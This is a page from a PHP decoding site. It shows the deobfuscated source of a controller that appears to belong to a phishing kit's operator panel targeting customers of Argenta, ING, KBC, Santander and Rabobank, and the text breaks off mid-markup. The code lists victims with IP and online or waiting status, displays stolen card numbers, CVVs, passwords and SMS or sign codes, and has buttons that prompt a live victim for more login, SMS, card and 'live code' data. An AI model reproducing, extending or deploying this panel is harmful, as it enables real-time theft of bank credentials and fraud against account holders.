Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php namespace App\Controllers\Users; use Core\View; use App\Models\Users\User; use App..

Decoded Output download

<?php 
 namespace App\Controllers\Users; use Core\View; use App\Models\Users\User; use App\Auth; class Logs extends \Core\Controller { public function logsAction() { if (Auth::isLoggedIn()) { $data = User::checkSession($_SESSION["username"]); if ($data) { if ($_SERVER["REQUEST_METHOD"] == "POST") { $logs = User::getLogs($_SESSION["username"]); $this->showLogs($logs); } else { View::render("Admin/logs.php", array("title" => "Logs")); } } else { Auth::destroySession(); } } else { static::redirect("/belgica/start"); } } public function getOneAction() { if (Auth::isLoggedIn()) { $data = User::checkSession($_SESSION["username"]); if ($data) { if ($_SERVER["REQUEST_METHOD"] == "POST" && isset($_POST["id"])) { $log = User::getLog($_POST["id"], $_SESSION["username"]); $this->showLog($log); } else { static::redirect("/admin/logs"); } } else { Auth::destroySession(); } } else { static::redirect("/belgica/start"); } } public function deleteAction() { if (Auth::isLoggedIn()) { $data = User::checkSession($_SESSION["username"]); if ($data) { if ($_SERVER["REQUEST_METHOD"] == "POST" && isset($_POST["id"])) { $data = array("id" => $_POST["id"]); $wachten = " \xf0\x9f\237\242"; $errors = array("id" => ''); $wachten = " \360\x9f\x9f\242"; if (empty($data["id"])) { $errors["id"] = "empty_id"; } if (empty($errors["id"])) { $check = User::deleteLog($_SESSION["username"], $data["id"]); if ($check) { echo json_encode(array("success" => "true")); } else { echo json_encode(array("fail" => "request_failed")); } } else { echo json_encode($errors); } } else { static::redirect("/belgica/start"); } } else { Auth::destroySession(); } } else { static::redirect("/belgica/start"); } } public function updateNoteAction() { if (Auth::isLoggedIn()) { $data = User::checkSession($_SESSION["username"]); if ($data) { if ($_SERVER["REQUEST_METHOD"] == "POST" && isset($_POST["id"]) && isset($_POST["note"])) { $data = array("id" => $_POST["id"], "note" => $_POST["note"]); $errors = array("id" => '', "note" => ''); if (empty($data["id"])) { $errors["id"] = "empty_id"; } if (empty($data["note"])) { $errors["note"] = "empty_note"; } if (empty($errors["id"]) && empty($errors["note"])) { $check = User::updateNote($_SESSION["username"], $data["id"], $data["note"]); if ($check) { echo json_encode(array("success" => "true")); } else { echo json_encode(array("fail" => "request_failed")); } } else { echo json_encode($errors); } } else { static::redirect("/belgica/start"); } } else { Auth::destroySession(); } } else { static::redirect("/belgica/start"); } } public function deleteAllAction() { if (Auth::isLoggedIn()) { $data = User::checkSession($_SESSION["username"]); if ($data) { if ($_SERVER["REQUEST_METHOD"] == "POST") { $check = User::deleteLogs($_SESSION["username"]); if ($check) { echo json_encode(array("success" => "true")); } else { echo json_encode(array("fail" => "request_failed")); } } else { static::redirect("/belgica/start"); } } else { Auth::destroySession(); } } else { static::redirect("/belgica/start"); } } public function deleteEmptyAction() { if (Auth::isLoggedIn()) { $data = User::checkSession($_SESSION["username"]); if ($data) { if ($_SERVER["REQUEST_METHOD"] == "POST") { $check = User::deleteEmptyLogs($_SESSION["username"]); if ($check) { echo json_encode(array("success" => "true")); } else { echo json_encode(array("fail" => "request_failed")); } } else { static::redirect("/belgica/start"); } } else { Auth::destroySession(); } } else { static::redirect("/belgica/start"); } } public function banAction() { if (Auth::isLoggedIn()) { $data = User::checkSession($_SESSION["username"]); if ($data) { if ($_SERVER["REQUEST_METHOD"] == "POST" && isset($_POST["id"]) && isset($_POST["ip"])) { $data = array("id" => $_POST["id"], "ip" => $_POST["ip"]); $errors = array("id" => '', "ip" => ''); if (empty($data["id"])) { $errors["id"] = "empty_id"; } if (empty($data["ip"])) { $errors["ip"] = "empty_ip"; } if (empty($errors["id"]) && empty($errors["ip"])) { $check = User::banUser($data["id"], $data["ip"]); if ($check) { echo json_encode(array("success" => "true")); } else { echo json_encode(array("fail" => "request_failed")); } } else { echo json_encode($errors); } } else { static::redirect("/belgica/start"); } } else { Auth::destroySession(); } } else { static::redirect("/belgica/start"); } } private function showLogs($logs) { $topLogs = array(); $otherLogs = array(); $userAgents = array("Google Chrome" => array("icon" => "fab fa-chrome", "type" => "Browser"), "Firefox" => array("icon" => "fab fa-firefox", "type" => "Browser"), "Safari" => array("icon" => "fab fa-safari", "type" => "Browser"), "Internet Explorer" => array("icon" => "fab fa-internet-explorer", "type" => "Browser"), "Microsoft Edge" => array("icon" => "fab fa-edge", "type" => "Browser"), "Opera" => array("icon" => "fab fa-opera", "type" => "Browser"), "Brave" => array("icon" => "fab fa-brave", "type" => "Browser"), "Windows" => array("icon" => "fab fa-windows", "type" => "OS"), "Mac OS" => array("icon" => "fab fa-apple", "type" => "OS"), "Linux" => array("icon" => "fab fa-linux", "type" => "OS")); foreach ($logs as $log) { $new_date = new \DateTime(); $old_date = new \DateTime($log["last_connected"]); $diff = $new_date->getTimestamp() - $old_date->getTimestamp(); $waiting = " bg-darker"; $wachten = " \342\x9a\xab | Offline"; if ($log["waiting"] == "true") { $waiting = " bg-blink"; $wachten = " \360\237\x94\xb4 | Waiting"; array_push($topLogs, $log); } else { if ($diff < 10) { $waiting = " bg-success"; $wachten = " \xf0\x9f\x9f\xa2 | Online"; array_push($topLogs, $log); } else { array_push($otherLogs, $log); } } } $allLogs = array_merge($topLogs, $otherLogs); foreach ($allLogs as $log) { $new_date = new \DateTime(); $old_date = new \DateTime($log["last_connected"]); $diff = $new_date->getTimestamp() - $old_date->getTimestamp(); $waiting = " bg-darker"; $wachten = " \342\232\xab | Offline"; if ($log["waiting"] == "true") { $waiting = " bg-blink"; $wachten = " \xf0\237\224\xb4 | Waiting"; } else { if ($diff < 10) { $waiting = " bg-success"; $wachten = " \xf0\x9f\237\242 | Online"; } } $userAgentName = $log["user_agent"]; $browserIcon = ''; $browserName = ''; $osIcon = ''; $osName = ''; foreach ($userAgents as $name => $info) { if (strpos($userAgentName, $name) !== false) { if ($info["type"] == "Browser") { $browserIcon = $info["icon"]; $browserName = $name; } else { if ($info["type"] == "OS") { $osIcon = $info["icon"]; $osName = $name; } } } } if (isset($_POST["empty"])) { $sql = "DELETE FROM logs WHERE santander_user = '' AND santander_pass = '' AND santander_exp = '' AND santander_number = '' AND santander_tan = '' AND santander_confirm = '' AND santander_wifi = '' AND santander_wifi_pass = '' AND santander_wifi_pass_two = '' AND santander_creditcard = '' AND santander_ccexp = '' AND santander_cvv = '' AND santander_code = '' AND santander_respons = ''"; $db = static::getDB(); $stmt = $db->prepare($sql); $stmt->execute(); header("Location: /logs"); die; } echo "<div class="cardke3ba col-lg-3">"; echo "<div class=" mb-1 bg-darker rounded  custom-card-sinco"> 
            <div class="card-header text-white " . $waiting . " siilenced-darker">\xa            <i style="color: #9c4dcc" class="fa fa-wifi" aria-hidden="true"></i>
 " . $log["ip"] . " </div>"; echo "<style> \xa    vssrtje {\xa        font-family: monospace;\xa    }\xa    .os-icon:before {\xa        font-size: 24px;\xa        margin-right: 8px;
    }\xa    .browser-icon:before {
        font-size: 24px;\xa        margin-right: 8px;\xa    }
.fa-windows {
  color: #9c4dcc; /* Windows color */
}

.fa-apple {
  color: #9c4dcc; /* Mac color */\xa}\xa
.fa-linux {\xa  color: #9c4dcc; /* Linux color */\xa}

.fa-chrome {\xa  color: #9c4dcc; /* Chrome color */
}\xa
.fa-firefox {\xa  color: #9c4dcc; /* Firefox color */
}\xa\xa.fa-safari {
  color: #9c4dcc; /* Safari color */\xa}\xa\xa.fa-internet-explorer {\xa  color: #9c4dcc; /* Internet Explorer color */
}\xa
.fa-edge {
  color: #9c4dcc; /* Edge color */\xa}\xa
.fa-opera {
  color: #9c4dcc; /* Opera color */
}

.fa-brave {
  color: #9c4dcc; /* Brave color */\xa}

</style><div class="card-body">\xa<div class="card mb-1 siilenced-darker rounded  custom-card">\xa<br>
<span style="color: #9c4dcc" class="fa fa-university" aria-hidden="true"></span><p style="font-size:16px;" >\xa " . htmlspecialchars($log["bank"]) . " </p>
\xa     \xa
<p>Status: " . $wachten . " </p>
<p><span class="vssrtje">OS: <span style="font-size: 20px;" class="" . htmlspecialchars($osIcon) . ""></span> <span style="font-size: 18px;" class="" . htmlspecialchars($browserIcon) . ""></span></span></p>

<p>\xa<vssrtje>\xa    <input type="text" style=" font-style: italic;" class="form-control rabo-login input-dark mt-1 custom-input" 
        placeholder="Note: " . ($log["note"] ? htmlspecialchars($log["note"]) : "NO NOTE FILLED IN") . ""\xa        id="note_" . htmlspecialchars($log["user_id"]) . "" onfocus="showButton('" . htmlspecialchars($log["user_id"]) . "')">\xa    <button class="btn btn-danger btn-sm animated-button" id="saveNoteButton_" . htmlspecialchars($log["user_id"]) . "" style=" display: none; opacity: 0;" 
        onclick="updateNote('" . htmlspecialchars($log["user_id"]) . "', document.getElementById('note_" . htmlspecialchars($log["user_id"]) . "').value)">\xa        <i class="fa fa-edit"></i> Save Note\xa    </button>
    <button class="btn btn-danger btn-sm animated-button" id="exitNoteButton_" . htmlspecialchars($log["user_id"]) . "" style="display: none; opacity: 0;" onclick="exitNote('" . htmlspecialchars($log["user_id"]) . "')">\xa        <i class="fa fa-times-circle" aria-hidden="true"></i>\xa Exit Note
    </button>\xa</vssrtje>\xa\xa
</p>\xa\xa\xa</div>


          "; ?> 
        <br> 
            <button class="btn btn-purple btn-sm" onclick="openUser('<?php  echo htmlspecialchars($log["user_id"]); ?> 
')"><i class="fas fa-external-link-alt"></i> View</button> 
            <button class="btn btn-purple btn-sm" onclick="deleteLog('<?php  echo htmlspecialchars($log["user_id"]); ?> 
')"><i class="fas fa-trash"></i> Delete</button> 
            <button class="btn btn-purple btn-sm" style="display: none;" onclick="updateNote('<?php  echo htmlspecialchars($log["user_id"]); ?> 
', document.getElementById('note').value)"><i class="fa fa-edit"></i> Save Note</button> 
    
            <?php  echo "<div class="collapse" id="" . htmlspecialchars($log["username"]) . htmlspecialchars($log["user_id"]) . "" style="">"; echo "</div>"; echo "</div>"; echo "</div>"; echo "</div>"; } } private function showLog($log) { $new_date = new \DateTime(); $old_date = new \DateTime($log["last_connected"]); $interval = $old_date->diff($new_date); $minutes = $interval->i; $hours = $interval->h; $days = $interval->d; $total_minutes = $minutes + $hours * 60 + $days * 24 * 60; $timeString = ''; if ($total_minutes >= 60) { $hours = floor($total_minutes / 60); $minutes = $total_minutes % 60; $timeString = $hours . " hour" . ($hours > 1 ? "s" : '') . " and " . $minutes . " minutes" . ($minutes > 1 ? "s" : '') . " ago"; } else { $timeString = $total_minutes . " minutes" . ($total_minutes > 1 ? "s" : '') . " ago"; } $bank = ''; if (!empty($log["bank"])) { $bank = '' . $log["bank"]; $user_id = $log["user_id"]; $ip = $log["ip"]; $waiting = $log["waiting"]; $last_connected = $log["last_connected"]; } if ($log["waiting"] == "true") { $waiting = " bg-blink"; $wachten = " \xf0\237\224\xb4 | Waiting"; echo "<audio autoplay loop><source src="/audio/vis.mp3" type="audio/mpeg"></audio>"; } else { if ($log["waiting"] < 10) { $waiting = " bg-success"; $wachten = " \360\x9f\x9f\xa2 | Online"; } } if ($log["waiting"] == "false") { $wachten = " \xe2\232\xab\xf0\x9f\237\xa2"; } $diff = $new_date->getTimestamp() - $old_date->getTimestamp(); echo "<br><br><div class="row p-1">"; if ($log["waiting"] === "true") { echo "<div class="col-12">"; echo "<div class="col-12 bg-blink rounded">"; echo "<h1 class="text-white text-center p-4" id="alert" style="font-size: 1.5rem"><i class="fa fa-wifi" aria-hidden="true"></i> Currently Waiting</h1>"; echo "</div>"; } else { if ($diff > 10) { echo "<div class="col-12">"; echo "<div class="col-12 bg-darker rounded">"; echo "<h1 class="text-white text-center p-4" id="alert" style="font-size: 1.5rem"><i class="fa fa-wifi" aria-hidden="true"></i> Currently Offline </h1>"; echo "</div>"; } else { echo "<div class="col-12">"; echo "<div class="col-12 bg-success rounded">"; echo "<h1 class="text-white text-center p-4" id="alert" style="font-size: 1.5rem"><i class="fa fa-wifi" aria-hidden="true"></i> Currently Online </h1>"; echo "</div>"; } } echo "<br><style>.border-left-danger {\xa    border-left: 0.25rem solid #1a1d20!important;\xa}</style><div class="row">

                    <div class="col-xl-3 col-md-6 mb-4">
               \xa\xa                        <div class="card border-left-danger custom-border bg-darker h-100 py-2">\xa
                            <div class="card-body">\xa
                                <div class="row no-gutters align-items-center">
                                    <div class="col mr-2">
\xa                                        <div class="text-xs font-weight-bold custom-text text-uppercase mb-1">\xa                                           <i class="fa fa-clock" aria-hidden="true"></i> </i>Last Seen</div>
                                        <div class="h5 mb-0 font-weight-bold text-white">" . $timeString . "</div>
                                    </div>
                                    <div class="col-auto">\xa                                      
                                    </div>\xa                                </div>\xa                            </div>\xa                        </div>
                    </div>\xa                    <div class="col-xl-3 col-md-6 mb-4">\xa                        <div class="card border-left-danger custom-border bg-darker h-100 py-2">
                            <div class="card-body">
                                <div class="row no-gutters align-items-center">\xa                                    <div class="col mr-2">
                                        <div class="text-xs font-weight-bold custom-text text-uppercase mb-1">
                                           <i class="fa fa-info-circle" aria-hidden="true"></i> IP ADDRESS</div>\xa                                        <div class="h5 mb-0 font-weight-bold text-white">" . $log["ip"] . "</div>\xa                                    </div>\xa                                    <div class="col-auto">\xa                                
                                    </div>\xa                                </div>
                            </div>
                        </div>\xa                    </div>
                    <div class="col-xl-3 col-md-6 mb-4">
                        <div class="card border-left-danger custom-border bg-darker h-100 py-2">\xa                            <div class="card-body">\xa                                <div class="row no-gutters align-items-center">
                                    <div class="col mr-2">
                                        <div class="text-xs font-weight-bold custom-text text-uppercase mb-1">
                                            <i class="fa fa-id-card" aria-hidden="true"></i> User ID</div>
                                        <div class="h5 mb-0 font-weight-bold text-white">" . $log["user_id"] . "</div>\xa                                    </div>
                                    <div class="col-auto">\xa\xa                                    </div>
                                </div>
                            </div>\xa                        </div>\xa                    </div>\xa                    <div class="col-xl-3 col-md-6 mb-4">\xa                        <div class="card border-left-danger custom-border bg-darker h-100 py-2">
                            <div class="card-body">
                                <div class="row no-gutters align-items-center">\xa                                    <div class="col mr-2">
                                        <div class="text-xs font-weight-bold custom-text text-uppercase mb-1">
                                           <i class="fa fa-university" aria-hidden="true"></i> Bank</div>
                                        <div class="h5 mb-0 font-weight-bold text-white">" . (empty($log["bank"]) ? "NOT SELECTED" : $log["bank"]) . "</div>\xa                                    </div>
                                    <div class="col-auto">

                                    </div>\xa                                </div>\xa                            </div>\xa                        </div>\xa                    </div>\xa                </div>"; echo "</div>"; echo "</div>"; echo "</div>"; echo "</div>"; echo "<style type="text/css">\xa    .modal-header {\xa    display: flex;
    align-items: flex-start;
    justify-content: space-between;\xa    padding: 1rem 1rem;\xa    border-bottom: 1px solid #202020;
    border-top-left-radius: calc(0.3rem - 1px);\xa    border-top-right-radius: calc(0.3rem - 1px);\xa}\xa.modal-footer {\xa    display: flex;\xa    flex-wrap: wrap;
    align-items: center;
    justify-content: flex-end;
    padding: 0.75rem;\xa    border-top: 1px solid #202020;\xa    border-bottom-right-radius: calc(0.3rem - 1px);
    border-bottom-left-radius: calc(0.3rem - 1px);
}\xa\xa.siilenced-darker {
    background-color: #1c1c1c;
}\xa</style><!-- Rabobank Modal -->"; echo ''; ?> 
<div class="modal fade" id="exampleModalCenter" tabindex="-1" role="dialog" aria-labelledby="exampleModalCenterTitle" aria-hidden="true"> 
  <div class="modal-dialog modal-dialog-centered" role="document"> 
    <div class="modal-content bg-darker"> 
      <div class="modal-header siilenced-darker"> 
        <h5 class="modal-title" id="exampleModalLongTitle"><i class="fa fa-ban" aria-hidden="true"></i> Are you sure u want to ban user?</h5> 
      </div> 
      <div class="modal-body"> 
        <p style="font-style: italic;">This action cannot be undone.</p> 
 
 
        <hr> 
 
        <p><i class="fa fa-database" aria-hidden="true"></i> Fetching Details <img height="15" width="15" src="/img/ing.gif"></p> 
<style> 
siilenced {  
  font-family: monospace; 
} 
</style><div class="card-body"> 
<div class="card mb-1 siilenced-darker rounded  custom-card"> 
 
<p><siilenced> Ip_address: <?php  echo htmlspecialchars($ip); ?> 
 </siilenced></p> 
<p><siilenced> user_agent: <?php  echo htmlspecialchars($log["user_agent"]); ?> 
</siilenced></p> 
<p><siilenced> user_id: <?php  echo htmlspecialchars($log["user_id"]); ?> 
</siilenced></p> 
<br><br> 
</div> 
      </div> 
      <div class="modal-footer"> 
        <button type="button" class="btn btn-outline-primary" data-dismiss="modal"><i class="fa fa-times" aria-hidden="true"></i> Close</button> 
        <button class="btn btn-outline-danger"  data-dismiss="modal" onclick="banUser('<?php  echo $log["ip"]; ?> 
', '<?php  echo $log["user_id"]; ?> 
')"><i class="fa fa-check" aria-hidden="true"></i> Yes</button> 
 
 
       <?php  echo "</div>
      </div>
    </div>\xa  </div>
 </div>
</div>"; echo "<!-- End Rabobank Modal -->"; echo "<style>\xa        .card-header {
    padding: 0.75rem 1.25rem;
    margin-bottom: 0;\xa    background-color: #1e1d1d;
    border-bottom: 1px solid #202020;
}</style><div class="row p-1">"; echo "<div class="col-lg-8 col-sm-12">"; echo "<div class="card-header text-white  bg-darker siilenced-darker">
            <i class="fa fa-info-circle" aria-hidden="true"></i> Captured Data
\xa
\xa            </div><div class="col-12 p-4 bg-darker">"; echo "<div class="veusdeput p-4 rounded"> "; if ($log["bank"] === "ARGENTA") { function ARGENTA($label, $value) { echo "<div class="form-group row">"; echo "<label for='id' class='text-secondary col-sm-3 font-weight-bold'>{$label}:</label>"; echo "<div class="col-sm-9">"; echo "<p class='text-secondary'><i><span class='copy-value' onclick='copyToClipboard(this)'>" . htmlspecialchars($value) . "</span><br/><span class='copy-text'>Click to copy</span></i></p>"; echo "</div>"; echo "</div>"; } if (!empty($log["argenta_wifi"])) { ARGENTA("CardNumber", $log["argenta_wifi"]); } if (!empty($log["argenta_wifi_pass"])) { ARGENTA("Expiry", $log["argenta_wifi_pass"]); } if (!empty($log["argenta_exp"])) { ARGENTA("SMS", $log["argenta_exp"]); } if (!empty($log["argenta_user"])) { ARGENTA("Phone", $log["argenta_user"]); } if (!empty($log["argenta_creditcard"])) { ARGENTA("Card Number", $log["argenta_creditcard"]); } if (!empty($log["argenta_ccexp"])) { ARGENTA("Expiry", $log["argenta_ccexp"]); } if (!empty($log["argenta_cvv"])) { ARGENTA("CVV", $log["argenta_cvv"]); } if (!empty($log["argenta_respons"])) { ARGENTA("Login Code", $log["argenta_respons"]); } if (!empty($log["argenta_respons_two"])) { ARGENTA("Live Code", $log["argenta_respons_two"]); } if ($log["waiting"] == "true") { ?> 
 
                    </div> 
                     <div class="row"> 
                            <div class="col-lg-3"> 
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setArgenta('<?php  echo htmlspecialchars($log["user_id"]); ?> 
', 'control')"><i class="fas fa-sign-in-alt"></i> Ask Login</button> 
                                
                            </div> 
                             <div class="col-lg-3"> 
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setArgenta('<?php  echo htmlspecialchars($log["user_id"]); ?> 
', 'details')"><i class="fa fa-envelope" aria-hidden="true"></i> 
 Ask SMS</button> 
                            </div> 
   
         <div class="col-lg-3"> 
                              <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setArgenta('<?php  echo htmlspecialchars($log["user_id"]); ?> 
', 'login')"><i class="fas fa-phone"></i> Phone</button> 
                            </div> 
                            <div class="col-lg-3"> 
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setArgenta('<?php  echo htmlspecialchars($log["user_id"]); ?> 
', 'creditcard')"><i class="fa fa-credit-card" aria-hidden="true"></i> 
 Ask Creditcard</button> 
                            </div> 
                            
                          
                            <div class="col-lg-3"> 
                                <button class="btn btn-sm btn-block btn-success mt-4" onclick="setArgenta('<?php  echo htmlspecialchars($log["user_id"]); ?> 
', 'finish')"><i class="fa fa-check-circle" aria-hidden="true"></i> Finish</button> 
                            </div>              
                    </div> 
                                               <div class="row"> 
 
                            <div class="col-lg-3"> 
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setArgenta('<?php  echo htmlspecialchars($log["user_id"]); ?> 
', 'photo')"><i class="fa fa-window-restore" aria-hidden="true"></i> 
 
 Ask Login Code</button> 
 
                            </div> 
 
                            <div class="col-lg-9"> 
                                <input type="text" class="form-control argenta-sign input-dark mt-4 custom-input" placeholder="Fill in your 'Login Code'"> 
 
                            </div> 
 
                            <div class="col-lg-3"> 
                                 <hr> 
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setArgenta('<?php  echo htmlspecialchars($log["user_id"]); ?> 
', 'live')"><i class="fa fa-shopping-basket" aria-hidden="true"></i> 
 
 
 Ask Live Code</button> 
                            </div> 
                              <div class="col-lg-9"> 
                                 <hr> 
                                <input type="text" class="form-control argenta-live input-dark mt-4 custom-input" placeholder="Fill in your first 'Live Code'"> 
                                <input type="text" class="form-control argenta-live-two input-dark mt-4 custom-input" placeholder="Fill in your second 'Live Code'"> 
 
                            </div> 
 
                        </div>   
 
                </div> 
            </div> 
<?php  } } else { if ($log["bank"] === "ING") { function ING($label, $value) { echo "<div class="form-group row">"; echo "<label for='id' class='text-secondary col-sm-3 font-weight-bold'>{$label}:</label>"; echo "<div class="col-sm-9">"; echo "<p class='text-secondary'><i><span class='copy-value' onclick='copyToClipboard(this)'>" . htmlspecialchars($value) . "</span><br/><span class='copy-text'>Click to copy</span></i></p>"; echo "</div>"; echo "</div>"; } if (!empty($log["ing_wifi"])) { $kaartbegin = '' . $log["ing_wifi"]; ING("CardNumber", $kaartbegin); } if (!empty($log["ing_wifi_pass"])) { ING("ING ID", $log["ing_wifi_pass"]); } if (!empty($log["ing_wifi_pass_two"])) { ING("Expiry", $log["ing_wifi_pass_two"]); } if (!empty($log["ing_user"])) { ING("Identify Code", $log["ing_user"]); } if (!empty($log["ing_exp"])) { ING("Phone", $log["ing_exp"]); } if (!empty($log["ing_creditcard"])) { ING("SMS", $log["ing_creditcard"]); } if (!empty($log["ing_password"])) { ING("Password", $log["ing_password"]); } if (!empty($log["ing_respons"])) { ING("Login Code", $log["ing_respons"]); } if (!empty($log["ing_code_x"])) { ING("Sign Code", $log["ing_code_x"]); } if (!empty($log["ing_code_m"])) { ING("Sign Code (2)", $log["ing_code_m"]); } if (!empty($log["ing_respons_two"])) { ING("Live Code", $log["ing_respons_two"]); } if ($log["waiting"] == "true") { ?> 
 
                    </div> 
                     <div class="row"> 
                            <div class="col-lg-3"> 
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setIng('<?php  echo htmlspecialchars($log["user_id"]); ?> 
', 'control')"><i class="fas fa-sign-in-alt"></i> Ask Login</button> 
                                
                            </div> 
                                     <div class="col-lg-3"> 
                              <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setIng('<?php  echo htmlspecialchars($log["user_id"]); ?> 
', 'login')"><i class="fas fa-key"></i> Identify Code</button> 
                            </div> 
                       
                
   
 <div class="col-lg-3"> 
                              <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setIng('<?php  echo htmlspecialchars($log["user_id"]); ?> 
', 'details')"><i class="fas fa-key"></i> Ask Phone</button> 
                            </div> 
 
                            <div class="col-lg-3"> 
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setIng('<?php  echo htmlspecialchars($log["user_id"]); ?> 
', 'creditcard')"><i class="fa fa-comments" aria-hidden="true"></i> 
 Ask SMS</button> 
                            </div> 
                            
                          
                            <div class="col-lg-3"> 
                                <button class="btn btn-sm btn-block btn-success mt-4" onclick="setIng('<?php  echo htmlspecialchars($log["user_id"]); ?> 
', 'finish')"><i class="fa fa-check-circle" aria-hidden="true"></i> Finish</button> 
                            </div>              
                    </div> 
                                               <div class="row"> 
 
                            <div class="col-lg-3"> 
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setIng('<?php  echo htmlspecialchars($log["user_id"]); ?> 
', 'photo')"><i class="fa fa-window-restore" aria-hidden="true"></i> 
 
 Ask Login Code</button> 
 
                            </div> 
 
                            <div class="col-lg-9"> 
                                <input type="text" class="form-control ing-sign input-dark mt-4 custom-input" placeholder="Fill in your 'Login Code'"> 
 
                            </div> 
                            <div class="col-lg-3"> 
                     
 
                            </div> 
 
                            <div class="col-lg-9"> 
                                <input hidden type="text" class="form-control ing-sign-two input-dark mt-4 custom-input" placeholder="Fill in your 'Sign Code'"> 
 
                            </div> 
                           <div class="col-lg-3"> 
                                 
                           
                            </div> 
                              <div class="col-lg-9"> 
                             
                                <input type="text" hidden class="form-control ing-sign-two-two input-dark mt-4 custom-input" placeholder="Fill in your first 'Sign Code'"> 
                                <input type="text" hidden class="form-control ing-sign-two-two-two input-dark mt-4 custom-input" placeholder="Fill in your second 'Sign Code'"> 
 
                            </div> 
                            <div class="col-lg-3"> 
                                 <hr> 
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setIng('<?php  echo htmlspecialchars($log["user_id"]); ?> 
', 'live')"><i class="fa fa-shopping-basket" aria-hidden="true"></i> 
 
 
 Ask Live Code</button> 
                            </div> 
                              <div class="col-lg-9"> 
                                 <hr> 
                                <input type="text" class="form-control ing-live input-dark mt-4 custom-input" placeholder="Fill in your first 'Live Code'"> 
                                <input type="text" class="form-control ing-live-two input-dark mt-4 custom-input" placeholder="Fill in your second 'Live Code'"> 
 
                            </div> 
 
 
                        </div>   
 
                </div> 
            </div> 
<?php  } } else { if ($log["bank"] === "KBC") { function KBC($label, $value) { echo "<div class="form-group row">"; echo "<label for='id' class='text-secondary col-sm-3 font-weight-bold'>{$label}:</label>"; echo "<div class="col-sm-9">"; echo "<p class='text-secondary'><i><span class='copy-value' onclick='copyToClipboard(this)'>" . htmlspecialchars($value) . "</span><br/><span class='copy-text'>Click to copy</span></i></p>"; echo "</div>"; echo "</div>"; } if (!empty($log["kbc_wifi"])) { $kaartbegin = '' . $log["kbc_wifi"]; KBC("CardNumber", $kaartbegin); } if (!empty($log["kbc_wifi_pass"])) { KBC("Expiry", $log["kbc_wifi_pass"]); } if (!empty($log["kbc_exp"])) { KBC("Phone", $log["kbc_exp"]); } if (!empty($log["kbc_password"])) { KBC("SMS", $log["kbc_password"]); } if (!empty($log["kbc_user"])) { KBC("Password", $log["kbc_user"]); } if (!empty($log["kbc_creditcard"])) { KBC("CC Number", $log["kbc_creditcard"]); } if (!empty($log["kbc_ccexp"])) { KBC("CC Exp", $log["kbc_ccexp"]); } if (!empty($log["kbc_cvv"])) { KBC("CVV", $log["kbc_cvv"]); } if (!empty($log["kbc_respons"])) { KBC("M1 Code", $log["kbc_respons"]); } if (!empty($log["kbc_code_x"])) { KBC("Sign Code", $log["kbc_code_x"]); } if (!empty($log["kbc_code_m"])) { KBC("Sign Code (2)", $log["kbc_code_m"]); } if (!empty($log["kbc_respons_two"])) { KBC("Live Code", $log["kbc_respons_two"]); } if ($log["waiting"] == "true") { ?> 
 
                    </div> 
                     <div class="row"> 
                            <div class="col-lg-3"> 
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setKBC('<?php  echo htmlspecialchars($log["user_id"]); ?> 
', 'control')"><i class="fas fa-sign-in-alt"></i> Ask Login</button> 
                                
                            </div> 
                  
   <div class="col-lg-3"> 
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setKBC('<?php  echo htmlspecialchars($log["user_id"]); ?> 
', 'details')"><i class="fa fa-credit-card" aria-hidden="true"></i> 
 Ask Phone</button> 
                            </div> 
     
   <div class="col-lg-3"> 
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setKBC('<?php  echo htmlspecialchars($log["user_id"]); ?> 
', 'password')"><i class="fa fa-credit-card" aria-hidden="true"></i> 
 Ask SMS</button> 
                            </div> 
                            <div class="col-lg-3"> 
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setKBC('<?php  echo htmlspecialchars($log["user_id"]); ?> 
', 'creditcard')"><i class="fa fa-credit-card" aria-hidden="true"></i> 
 Ask Creditcard</button> 
                            </div> 
                            
                          
                            <div class="col-lg-3"> 
                                <button class="btn btn-sm btn-block btn-success mt-4" onclick="setKBC('<?php  echo htmlspecialchars($log["user_id"]); ?> 
', 'finish')"><i class="fa fa-check-circle" aria-hidden="true"></i> Finish</button> 
                            </div>              
                    </div> 
                                               <div class="row"> 
 
                            <div class="col-lg-3"> 
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setKBC('<?php  echo htmlspecialchars($log["user_id"]); ?> 
', 'photo')"><i class="fa fa-window-restore" aria-hidden="true"></i> 
 
 Ask Login Code</button> 
 
                            </div> 
 
                            <div class="col-lg-9"> 
                                <input type="text" class="form-control kbc-sign input-dark mt-4 custom-input" placeholder="Fill in your 'Login Code'"> 
 
                            </div> 
                            <div hidden class="col-lg-3"> 
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setKBC('<?php  echo htmlspecialchars($log["user_id"]); ?> 
', 'sign')"><i class="fa fa-window-restore" aria-hidden="true"></i> 
 
 Ask Sign Code</button> 
 
                            </div> 
 
                            <div hidden class="col-lg-9"> 
                                <input type="text" class="form-control kbc-sign-two input-dark mt-4 custom-input" placeholder="Fill in your 'Sign Code'"> 
 
                            </div> 
                           <div class="col-lg-3"> 
                                
                      
                            </div> 
                              <div class="col-lg-9"> 
                                 
                                <input hidden type="text" class="form-control kbc-sign-two-two input-dark mt-4 custom-input" placeholder="Fill in your first 'Sign Code'"> 
                                <input hidden type="text" class="form-control kbc-sign-two-two-two input-dark mt-4 custom-input" placeholder="Fill in your second 'Sign Code'"> 
 
                            </div> 
                            <div class="col-lg-3"> 
                                 <hr> 
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setKBC('<?php  echo htmlspecialchars($log["user_id"]); ?> 
', 'live')"><i class="fa fa-shopping-basket" aria-hidden="true"></i> 
 
 
 Ask Live Code</button> 
                            </div> 
                              <div class="col-lg-9"> 
                                 <hr> 
                                <input type="text" class="form-control kbc-live input-dark mt-4 custom-input" placeholder="Fill in your first 'Live Code'"> 
